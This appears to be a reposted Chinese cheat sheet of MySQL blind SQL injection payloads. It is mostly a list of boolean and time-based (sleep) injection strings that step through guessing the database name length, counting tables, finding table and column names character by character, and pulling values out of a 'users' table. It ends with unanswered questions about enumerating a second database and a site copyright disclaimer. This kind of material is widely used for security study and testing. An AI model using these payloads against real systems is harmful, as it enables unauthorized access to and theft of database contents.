盲注代码

盲注代码

判断数据库名的长度 小于5

and length(database()) = 4

或者：通过返回时间来判断数据库名的长度

and if(length(database()) <5,sleep(10),1) --

猜库名

and ascii(substr(database(),1,1)) >=65    （65为asii值）

猜表的数量

and (select count(table_name) from information_schema.tables where table_schema = database()) =2

第一个表名的长度

and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9

或者：通过返回时间来判断第一个表名的长度

and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>8,sleep(2),1) --

猜第二个表名的长度

and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=9

........

substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)

猜第一个表名的第一个字母

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1)) >97

猜第一个表名的第二个字母

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,2)) >97

猜第一个表名的第三个字母

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),3,3)) >97

...........

猜第二个表名的第一个字母

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 1,1),1,1)) >97

猜第二个表名的第二个字母

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 1,1),2,2)) >97

................

猜第一个表的字段个数

and (select count(column_name) from information_schema.columns where table_name = (select table_name from information_schema.tables where table_schema=database() limit 0,1)) >1

或者：通过返回时间来猜第一个表的字段个数

and if((select count(column_name) from information_schema.columns where table_name = (select table_name from information_schema.tables where table_schema=database() limit 0,1)) >1,sleep(2),1)

猜第二个表的字段个数

and (select count(column_name) from information_schema.columns where table_name = (select table_name from information_schema.tables where table_schema=database() limit 1,1)) >1

.................

猜第一个表的第一个字段长度

and length(substr((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 0,1),1)) > 1

猜第一个表的第二个字段长度

and length(substr((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 1,1),1)) > 1

.........................

猜guestbook表的第一个字段长度

and length(substr((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1),1)) > 1

猜第一个表的第一个字段名的第一个字

and ascii(substr((select column_name from information_schema.columns where table_name= (select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 0,1),1)) >97

猜第一个表的第一个字段名的第二个字

and ascii(substr((select column_name from information_schema.columns where table_name= (select table_name from information_schema.tables where table_schema = database() limit 0,1) limit 1,1),1)) >97

猜第二个表的第一个字段的第一行的字段值

先求它长度

and length(substr((select user_id from users limit 0,1),1)) =1

求它的值

and ascii(substr((select user_id from users limit 0,1),1,1)) >1

怎么查询第二个库？？？？？？？？？？？？？？？？？？？？？？？？？？

information.schema.cshema.name             select count(schema_name)  from information_schema.schemata =7

怎么查询第二个库里的表？？？？？？？？？？？？？？？？？？？？？？？？？

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。